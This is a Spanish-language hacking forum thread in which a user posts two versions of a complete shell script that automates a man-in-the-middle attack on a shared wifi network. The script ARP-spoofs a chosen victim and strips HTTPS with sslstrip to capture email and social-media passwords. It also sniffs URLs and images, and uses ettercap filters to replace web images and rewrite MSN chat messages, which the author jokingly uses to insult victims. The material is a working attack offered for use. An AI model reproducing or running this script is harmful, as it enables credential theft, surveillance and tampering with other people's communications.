elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Script automatizado para ataque MITM
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Script automatizado para ataque MITM  (Leído 6,137 veces)
aqqle

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Script automatizado para ataque MITM
« en: 16 Abril 2013, 23:24 pm »

Muy buenas señores,
Les traigo un script que he realizado y he creído conveniente publicar, ya que es una pena dejarlo en el bahúl de las herramientas...

Es para realizar un ataque MITM, supongo que ya sabrán de qué va la historia...

¿Qué nos permite hacer este script?
Ver las direcciones que está viendo otro usuario de la wifi, ver su usuario y password de gmail, facebook, messenger, hotmail, etc etc (aún y usar el https   :silbar:), ver las imágenes que está viendo (y cambiarlas jajajaja  ;-) ) tmb cambiar conversaciones del msn (la víctima pone "hola" y lo cambiamos a "Perra"  :¬¬ ) en fin aya cada uno...

Eso si, está realizado para ubuntu.. y supongo que alguna otra plataforma linux, yo personalmente uso bugtraq y funciona de maravilla.
Aquí el code..
Código:
#!/bin/sh
quit="no"
configuracion_todo () {
clear
echo "------------------------------------------------"
echo "Creando los filtros para ettercap..."
echo "------------------------------------------------"
sleep 1
echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter
echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter
echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter
echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter
echo "   }" >> mitmsg.filter
echo "}" >> mitmsg.filter
echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter
echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter
echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter
echo "# note: replacement string is same length as original string" >> mitm.filter
echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter
echo "   }" >> mitm.filter
echo "}" >> mitm.filter
echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter
echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "msg(\"Filter Ran. \\n\");" >> mitm.filter
echo "}" >> mitm.filter
echo "--------------------------------------------> OK"
echo ""
sleep 1
echo "------------------------------------------------"
echo "Configurar equipo para el ataque MITM"
echo "------------------------------------------------"
sleep 1
echo "Verificando los paquetes necesarios..."
echo "------------------------------------------------"
echo "xterm"
verificacion=$(aptitude show xterm | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "xterm ya está instalado"
else
echo "xterm no está instalado, INSTALANDO..."
sleep 1
sudo apt-get install xterm &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "sslstrip"
verificacion=$(aptitude show sslstrip | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "sslstrip ya está instalado"
else
echo "sslstrip no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install sslstrip &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "ettercap"
verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}')
if [ "$verificacion" = "install" ]; then
echo "ettercap ya está instalado"
else
echo "ettercap no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install ettercap &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "dsniff"
verificacion=$(aptitude show dsniff | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "dsniff ya está instalado"
else
echo "dsniff no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install dsniff &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "driftnet"
verificacion=$(aptitude show driftnet | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "driftnet ya está instalado"
else
echo "driftnet no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get install driftnet &
fi
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo ""
echo "Verificación de paquetes finalizada"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 1
echo "Activando ip_forward"
xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
echo "--------------------------------------------> OK"
sleep 1
echo "Configurando iptables"
xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "--------------------------------------------> OK"
sleep 2
echo "Indica tu interface de red:"
echo "Ej: wlan0, eth1 ..."
echo "------------------------------------------------"
read interface
sleep 1
echo ""
echo "--------------------------------------------> OK"
sleep 1

}
busc_victima () {
clear
echo "------------------------------------------------"
echo "Buscar víctima..."
echo "------------------------------------------------"
sleep 1
echo ""
echo "Mostrando tu dirección ip:"
sleep 1
ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20
echo "------------------------------------------------"
echo "Indica el rango a escanear (ej: 192.168.0.* )"
echo "------------------------------------------------"
read rango
sleep 2
echo "------------------------------------------------"
echo "Mostrando lista de usuarios conectados a la red"
echo "------------------------------------------------"
sleep 3
xterm -hold -e nmap -sP $rango --system-dns &
}
inic_mitm () {
clear
echo "------------------------------------------------"
echo "Iniciar ataque MITM"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Iniciando sslstrip"
xterm -hold -e sslstrip -a -k -f &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando arpspoof"
echo "Indica la ip de la puerta de enlace:"
echo "------------------------------------------------"
read penlaces
sleep 1
echo "------------------------------------------------"
echo "Indica la ip de la víctima:"
echo "------------------------------------------------"
read victima
sleep 1
xterm -hold -e arpspoof -i $interface -t $victima $penlaces &
echo "--------------------------------------------> OK"
sleep 3
echo ""
echo "Iniciando ettercap"
xterm -hold -e sudo ettercap -T -q -i $interface &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando driftnet"
sleep 10
xterm -hold -e driftnet -i $interface &
echo "--------------------------------------------> OK"
echo ""
echo "Iniciando urlsnarf"
sleep 1
  xterm -hold -e urlsnarf -i $interface &
echo "--------------------------------------------> OK"
sleep 2
}
salida_x () {
clear
sleep 2
echo "Desactivando ip_forward"
xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward &
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Eliminando posibles filtros creados"
rm imagen.ef
rm msg.ef
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 2
rm mitm.filter
rm mitmsg.filter
clear
}
camb_imagen () {
clear
echo "------------------------------------------------"
echo "Cambiar imagenes"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica la dirección de la imagen falsa:"
echo "Ej: http://www.arcpujol.com/construccio.jpg"
echo "------------------------------------------------"
read direccionfalsa
xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter &
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitm.filter -o imagen.ef &
echo "--------------------------------------------> OK"
rm mitm.filter
mv mitm.filtere mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
camb_msn () {
clear
echo "------------------------------------------------"
echo "Cambiar los mensajes salientes de msn"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica primero qué palabra quieres cambiar"
echo "Ej: hola"
echo "------------------------------------------------"
read convfalsa
cp mitmsg.filter mitmsg.filter1
xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter &
echo ""
rm mitmsg.filtere
echo "Indica la palabra que sustituirá a la anterior"
echo "Ej: perra"
echo "------------------------------------------------"
read convfalsa1
xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter &
rm mitmsg.filtere
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitmsg.filter -o msg.ef &
echo "--------------------------------------------> OK"
rm mitmsg.filter
mv mitmsg.filter1 mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}

while [ $quit != "yes" ]
do
clear
echo "------------------------------------------------"
echo "     AQQLE  /     AQQLE /    AQQLE /     AQQLE/"
echo "AQQLE/     /AQQLE/     /AQQLE /   /AQQLE/    /"
echo "    / AQQLE     /AQQLE/      /AQQLE    / AQQLE"
echo "------------------------------------------------"
echo ""
echo "Menú de opciones MITM"
echo "================================================"
echo "1.  Configuración necesaria para el ataque MITM"
echo "------------------------------------------------"
echo "2.  Buscar víctima"
echo "3.  Iniciar ataque MITM"
echo "4.  Cambiar las imagenes entrantes a la víctima"
echo "5.  Cambiar las conversaciones de msn salientes"
echo "------------------------------------------------"
echo "0. Salir"
echo "------------------------------------------------"
echo -n "Escoje acción: "
read eleccio
case $eleccio in
1) configuracion_todo;;
2) busc_victima;;
3) inic_mitm;;
4) camb_imagen;;
5) camb_msn;;
0) salida_x;
quit="yes";;
*) echo "\"$eleccio\" Porfavor escoja un número del 0 al 5..."
sleep 2 ;;
esac
done
Saludos!  :silbar:
« Última modificación: 17 Abril 2013, 21:42 pm por aqqle » En línea

aqqle

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: Script automatizado para ataque MITM
« Respuesta #1 en: 21 Abril 2013, 12:51 pm »

La respuesta la tienes arriba... :silbar:
En línea

GrayMan

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Script automatizado para ataque MITM
« Respuesta #2 en: 25 Abril 2013, 08:26 am »

Una pregunta, ultimamente a lo que mas me dedico es a esto, a hacer scripts de utilidades en linux, automatizar procesos, etc... y lo que no entiendo es porque utlizas tanto el sleep entre comando y comando.

Por lo demas un buen aporte  :-* thx
En línea

aqqle

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: Script automatizado para ataque MITM
« Respuesta #3 en: 25 Abril 2013, 10:42 am »

Pues buena pregunta, no se pq siempre le pongo sleep supongo q por vicio  :xD.. Lo hago para que quede algo mejor supongo, da mas tiempo a leer..

Aquí el mismo con zenity:

Código:
#!/bin/sh
quit="no"
configuracion_todo () {
clear
echo "------------------------------------------------"
echo "Creando los filtros para ettercap..."
echo "------------------------------------------------"
sleep 1
echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter
echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter
echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter
echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter
echo "   }" >> mitmsg.filter
echo "}" >> mitmsg.filter
echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter
echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter
echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter
echo "# note: replacement string is same length as original string" >> mitm.filter
echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter
echo "   }" >> mitm.filter
echo "}" >> mitm.filter
echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter
echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "msg(\"Filter Ran. \\n\");" >> mitm.filter
echo "}" >> mitm.filter
echo "--------------------------------------------> OK"
echo ""
sleep 1
echo "------------------------------------------------"
echo "Configurar equipo para el ataque MITM"
echo "------------------------------------------------"
sleep 1
echo "Verificando los paquetes necesarios..."
echo "------------------------------------------------"
echo "xterm"
verificacion=$(aptitude show xterm | grep State | awk '{print $2}')
if [ "$verificacion" = "installed" ]; then
echo "xterm ya está instalado"
else
echo "xterm no está instalado, INSTALANDO..."
sleep 1
sudo apt-get --force-yes install xterm &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "sslstrip"
verificacion=$(aptitude show sslstrip | grep State | awk '{print $2}')
if [ "$verificacion" = "installed" ]; then
echo "sslstrip ya está instalado"
else
echo "sslstrip no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install sslstrip &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "ettercap"
verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}')
if [ "$verificacion" = "install" ]; then
echo "ettercap ya está instalado"
else
echo "ettercap no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install ettercap &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "dsniff"
verificacion=$(aptitude show dsniff | grep State | awk '{print $2}')
if [ "$verificacion" = "installed" ]; then
echo "dsniff ya está instalado"
else
echo "dsniff no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install dsniff &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "driftnet"
verificacion=$(aptitude show driftnet | grep State | awk '{print $2}')
if [ "$verificacion" = "installed" ]; then
echo "driftnet ya está instalado"
else
echo "driftnet no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install driftnet &
fi
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo ""
echo "Verificación de paquetes finalizada..."
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 1
echo "Activando ip_forward"
xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
echo "--------------------------------------------> OK"
sleep 1
echo "Configurando iptables"
xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "--------------------------------------------> OK"
sleep 2
echo "Indica tu interface de red:"
echo "Ej: wlan0, eth1 ..."
echo ""
iwconfig
echo "------------------------------------------------"
interface=$(zenity --entry \
--title=".:MITM:." \
--text="Indica tu interface de red: (ej: wlan0, eth1, etc...)" \
)
sleep 1
echo ""
echo "--------------------------------------------> OK"
sleep 2
}
busc_victima () {
clear
echo "------------------------------------------------"
echo "Buscar víctima..."
echo "------------------------------------------------"
sleep 1
echo ""
echo "Mostrando tu dirección ip:"
sleep 1
tuip=$(ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20)
ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20
echo "------------------------------------------------"
echo "Indica el rango a escanear (ej: 192.168.0.* )"
echo "------------------------------------------------"
rango=$(zenity --entry \
--title="Rango a escanear por nmap .:MITM:." \
--text="Indica el rango a escanear" \
--text="Tu ip es:" \
--text="$tuip" \
)
sleep 1
echo "------------------------------------------------"
echo "Mostrando lista de usuarios conectados a la red"
echo "------------------------------------------------"
sleep 1
xterm -T "Lista de usuarios conectados a la red .:MITM:." -n "AQQLE .:MITM:." -hold -e nmap -sP $rango --system-dns &
sleep 3
}
inic_mitm () {
clear
echo "------------------------------------------------"
echo "Iniciar ataque MITM"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Iniciando sslstrip"
xterm -hold -e sslstrip -a -k -f &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando arpspoof"
echo "Indica la ip de la puerta de enlace:"
echo "------------------------------------------------"
penlaces=$(zenity --entry \
--title="Iniciando arpspoof .:MITM:." \
--text="Indica la ip de la puerta de enlace:" \
--text="ej: 192.168.0.1" \
)
sleep 1
echo "------------------------------------------------"
echo "Indica la ip de la víctima:"
echo "------------------------------------------------"
victima=$(zenity --entry \
--title="Iniciando arpspoof .:MITM:." \
--text="Indica la ip de la víctima" \
)
sleep 1
xterm -hold -e arpspoof -i $interface -t $victima $penlaces &
echo "--------------------------------------------> OK"
sleep 3
echo ""
echo "Iniciando ettercap"
xterm -hold -e sudo ettercap -T -q -i $interface &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando driftnet"
sleep 10
xterm -hold -e driftnet -i $interface &
echo "--------------------------------------------> OK"
echo ""
echo "Iniciando urlsnarf"
sleep 1
xterm -hold -e urlsnarf -i $interface &
echo "--------------------------------------------> OK"
sleep 2
}
salida_x () {
clear
sleep 2
echo "Desactivando ip_forward"
xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward &
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Eliminando posibles filtros creados"
echo""
nohup rm imagen.ef
nohup rm msg.ef
echo ""
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 2
rm mitm.filter
rm mitmsg.filter
rm nohup.out
clear
}
camb_imagen () {
clear
echo "------------------------------------------------"
echo "Cambiar imagenes"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica la dirección de la imagen falsa:"
echo "Ej: http://www.arcpujol.com/construccio.jpg"
echo "------------------------------------------------"
direccionfalsa=$(zenity --entry \
--title="Construyendo filtro .:MITM:." \
--text="Indica la dirección de la imagen falsa:" \
--text="Ej: http://www.pagweb/imagen.jpg" \
)
xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter &
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitm.filter -o imagen.ef &
echo "--------------------------------------------> OK"
rm mitm.filter
mv mitm.filtere mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
camb_msn () {
clear
echo "------------------------------------------------"
echo "Cambiar los mensajes salientes de msn"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica primero qué palabra quieres cambiar"
echo "Ej: hola"
echo "------------------------------------------------"
convfalsa=$(zenity --entry \
--title="Creando filtro ettercap .:MITM:." \
--text="Indica primero qué palabra quieres cambiar" \
)
cp mitmsg.filter mitmsg.filter1
xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter &
echo ""
rm mitmsg.filtere
echo "Indica la palabra que sustituirá a la anterior"
echo "Ej: perra"
echo "------------------------------------------------"
convfalsa1=$(zenity --entry \
--title="Creando filtro ettercap .:MITM:." \
--text="Indica la palabra que sustituirá a la anterior" \
)
xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter &
rm mitmsg.filtere
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitmsg.filter -o msg.ef &
echo "--------------------------------------------> OK"
rm mitmsg.filter
mv mitmsg.filter1 mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
while [ $quit != "yes" ]
do
clear
echo "------------------------------------------------"
echo "     AQQLE  /     AQQLE /    AQQLE /     AQQLE/"
echo "AQQLE/     /AQQLE/     /AQQLE /   /AQQLE/    /"
echo "    / AQQLE     /AQQLE/      /AQQLE    / AQQLE"
echo "------------------------------------------------"
echo ""
echo ""
echo "Menú de opciones MITM"
echo "================================================"
echo "*   Configuración necesaria para el ataque MITM"
echo "------------------------------------------------"
echo "*   Buscar víctima"
echo "*   Iniciar ataque MITM"
echo "*   Cambiar las imagenes entrantes a la víctima"
echo "*   Cambiar las conversaciones de msn salientes"
echo "------------------------------------------------"
echo "*   Salir"
echo "------------------------------------------------"
echo ""
echo -n "Escoje acción"
eleccion=$(zenity --list --column "Opciones:" "Configuración" "Buscar víctima" "Iniciar ataque MITM" "Cambiar imagenes entrantes" "Cambiar conversaciones salientes" "Salir" --text "Escoje acción:" --title="Menú .:MITM:. por aqqle" --height=255 --width=260)
if [ "$eleccion" = "Configuración" ]; then
configuracion_todo;
elif [ "$eleccion" = "Buscar víctima" ]; then
busc_victima;
elif [ "$eleccion" = "Iniciar ataque MITM" ]; then
inic_mitm;
elif [ "$eleccion" = "Cambiar imagenes entrantes" ]; then
camb_imagen;
elif [ "$eleccion" = "Cambiar conversaciones salientes" ]; then
camb_msn;
elif [ "$eleccion" = "Salir" ]; then
salida_x;
quit="yes";
else
exit 0
fi
done
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
PixieScript v2.1, ataque automátizado Pixie Dust Attack « 1 2 »
Wireless en Linux
ChimoC 10 17,506 Último mensaje 3 Septiembre 2018, 09:08 am
por BgCRaCK
PixieScript v2.5, ataque automatizado Pixie Dust Attack
Wireless en Linux
El_Andaluz 0 5,497 Último mensaje 26 Abril 2015, 06:09 am
por El_Andaluz
[Serio] Implementar ataque MITM + SSLstrip para windows con C# y winpcap
Hacking
Kaxperday 5 6,725 Último mensaje 11 Octubre 2015, 17:57 pm
por Kaxperday
zizzania v0.0.1- automatizado ataque deauth.
Wireless en Linux
El_Andaluz 0 3,065 Último mensaje 23 Noviembre 2016, 04:44 am
por El_Andaluz
Bloqueo de Facebook Messenger para Android con un ataque MITM
Noticias
r32 0 1,319 Último mensaje 10 Julio 2018, 20:51 pm
por r32
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines